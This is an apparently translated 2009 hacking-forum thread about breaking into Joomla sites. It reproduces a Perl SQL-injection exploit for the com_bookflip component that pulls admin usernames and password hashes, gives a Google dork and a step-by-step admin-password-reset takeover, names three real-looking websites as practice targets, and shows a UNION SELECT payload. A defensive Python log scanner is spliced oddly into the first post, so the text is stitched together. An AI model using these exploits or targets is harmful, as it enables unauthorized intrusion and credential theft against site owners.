Re: joomla hack

Posted: Wed Jul 01, 2009 4:07 pm
by j.gladiator
Although I haven't tried it yet... I just want to share it here.... (source: milw0rm)

#!/usr/bin/perl -w

#Joomla com_bookflip(book_id) Sql injection#
########################################
#[~] Author : boom3rang
#[~] Greetz : H!tm@N - KHG - cHs - LiTTLE-HaCkEr - SpywarrioR - cRu3l.b0y - Lanti-Net - urtan
#---------------------------------------
#[!] <name>BookFlip</name>
#[!] <creationDate>Juin 2008</creationDate>
#[!] <author>FCI F-Cimag-In</author>
#[!] <copyright>Ce composant est distribué gratuitement.</copyright>
#[!] <authorEmail>[email protected]</authorEmail>
#[!] <authorUrl>www.f-cimag-in.com</authorUrl>
#[!] <version>2.1</version>
#---------------------------------------
#[!] Google_Dork: inurl:"com_bookflip"
########################################

system("color FF0000");
print "\t ###############################################################\n\n";
print "\t # Kosova Hackers Group (KHG-CREW) #\n\n";
print "\t ###############################################################\n\n";
print "\t # - Joomla com_bookflip(book_id)Remote SQL Injection Vuln #\n\n";
print "\t # - R.I.P redc00de #\n\n";
print "\t # - Cod3d by boom3rang #\n\n";
print "\t ###############################################################\n\n";
use LWP::UserAgent;
print "\nTarget page:[http://wwww.localhost/pathdir/]: ";
chomp(my $target=<STDIN>);
#Column Name
$c_n="concat(username,0x3a,password)";
#Table_name
$t_n="jos_users";
$U="-9999+UNION+SELECT+";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/index.php?option=com_bookflip&book_id=".$U."1,".$c_n.",3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from/**/".$t_n."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "# Veprimi mbaroi me sukses(Congratulations)! #\n\n";
}
else{print "\n[-] Veprimi Deshtoi (Not Found)...\n";
}

########################
# - Proud 2 be Albanian
# - Proud 2 be Muslim
########################

# milw0rm.com [2009-06-29]
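
The request built by the script above puts SQL into `book_id`, a parameter that otherwise holds a plain integer, so it stands out in a web server access log. As an added example (not part of the original post or of the milw0rm code), this Python check flags such requests; the log lines are constructed, and the parameter map and function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Integer-only parameters seen in this thread (the map itself is an assumption).
INT_PARAMS = {"com_bookflip": "book_id", "com_category": "catid"}
SQL_TOKENS = re.compile(
    r"\b(union|select|from|concat|information_schema)\b|@@|--|0x[0-9a-f]+", re.I)
LOG_LINE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+)')

# Constructed sample log (documentation addresses, shortened payload).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Jun/2009:10:00:01 +0000] "GET /index.php?option=com_bookflip&book_id=7 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [29/Jun/2009:10:00:09 +0000] "GET /index.php?option=com_bookflip&book_id=-9999+UNION+SELECT+1,2,3+from/**/jos_users+--+ HTTP/1.1" 200 8311',
    '192.0.2.45 - - [29/Jun/2009:10:00:12 +0000] "GET /index.php?option=com_category&task=loadCategory&catid=12%27 HTTP/1.1" 500 312',
    '192.0.2.10 - - [29/Jun/2009:10:00:15 +0000] "GET /index.php?option=com_content&id=3 HTTP/1.1" 200 4096',
]

def normalise(value):
    """Collapse inline comments and whitespace used in place of spaces."""
    value = re.sub(r"/\*.*?\*/", " ", value)
    return re.sub(r"\s+", " ", value).strip()

def check_url(url):
    """Return (component, param, reason) if an integer parameter is abused."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    component = query.get("option", [""])[0]
    param = INT_PARAMS.get(component)
    for raw in query.get(param, []) if param else []:
        value = normalise(raw)  # parse_qs already decoded %xx and '+'
        if not re.fullmatch(r"\d+", value):
            reason = "sql-keywords" if SQL_TOKENS.search(value) else "non-integer"
            return (component, param, reason)
    return None

def scan(lines):
    """Return (client, component, param, reason) for each flagged log line."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        finding = check_url(m.group(2)) if m else None
        if finding:
            hits.append((m.group(1),) + finding)
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same integer test belongs in the component itself: a `book_id` that is cast to an integer before it reaches the query cannot carry the `UNION SELECT` text at all.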

Re: joomla hack

Posted: Sat Jul 04, 2009 12:13 am
by zarskycrew
j.gladiator wrote: first go to google.com
second, enter this
inurl:option=com_user
next..
target:
for example: >>>>>http://situstarget.com/index.php?option ... view=reset<<<<<
is changed to
>>>>>http://situstarget.com/index.php?option ... ut=confirm<<<<<<
after that a token will appear
fill it in with ' <----------- why does it have to be the mark ---------->'
well, just try it..
then after that password and verify password will appear
fill them in with whatever you like
after that log in
with the username Admin and the password you just filled in
after that
the admin is yours...
done.....

After resetting the password, when I try to log in it keeps failing ..
is the username wrong or something?
how do I find the username??

Re: joomla hack

Posted: Sat Jul 04, 2009 9:02 pm
by Quick_5ilv3r
Cool, bro, but it's old.. :D

Re: joomla hack

Posted: Wed Jul 15, 2009 1:16 pm
by mahaja
yup....

the method is right ....

but that's old, bro...

but it's fine, we're just sharing with each other...
keep experimenting...

Re: joomla hack

Posted: Mon Jul 20, 2009 9:45 am
by vodork
wew nice too :D :D
but that one's old too :roll: :roll:
go on and look for a new one :twisted: :twisted:

lock

Re: joomla hack

Posted: Mon Jul 20, 2009 11:50 am
by shad.hckr
site: Joomla
dork: com_category
method: SQLi
credits: milw0rm

Code: Select all

http://www.epsau.com.au/index.php?option=com_category&task=loadCategory&catid=12

http://www.hendrygroup.com.au/index.php?option=com_category&task=loadCategory&catid=11

http://www.hgau.com.au/index.php?option=com_category&task=loadCategory&catid=131
Here are some targets.. you can get the password too.. practise SQLi while you're at it..
This is Joomla but it makes use of an SQL hole. If you don't know how yet, just search this forum.

Re: joomla hack

Posted: Sun Aug 23, 2009 8:49 pm
by Sniffer_Vandal
Fun, fun, keep going. I want to learn SQL injection
Ooh, where can I learn it...?
So I can learn it fast...?
ooh, I want to be able to do SQL injection...
hehehehehehe....

Re: joomla hack

Posted: Mon Aug 24, 2009 12:42 pm
by .::Z10R::.
Sniffer_Vandal wrote: Fun, fun, keep going. I want to learn SQL injection
Ooh, where can I learn it...?
So I can learn it fast...?
ooh, I want to be able to do SQL injection...
hehehehehehe....

You want to learn, so why do you want it instant? :)

Re: joomla hack

Posted: Mon Oct 19, 2009 8:11 pm
by Sniffer_Vandal
.::Z10R::. wrote:
Sniffer_Vandal wrote: Fun, fun, keep going. I want to learn SQL injection
Ooh, where can I learn it...?
So I can learn it fast...?
ooh, I want to be able to do SQL injection...
hehehehehehe....
You want to learn, so why do you want it instant? :)

What is it, instant noodles...?
hahahahahahahahahaha.....

Nice bro, just kidding...!!!
we learn slowly...
so far I can only display the version
after displaying the version, what then...?

example: index.php?id=-100+union+all+select 1,2,@@version,4--

so what comes after that...?
can anyone help?

Re: joomla hack

Posted: Fri Jan 15, 2010 8:47 am
by blackxnovo
Confusing!
The explanation isn't clear!
bro... please make it clearer.
thanks in advance.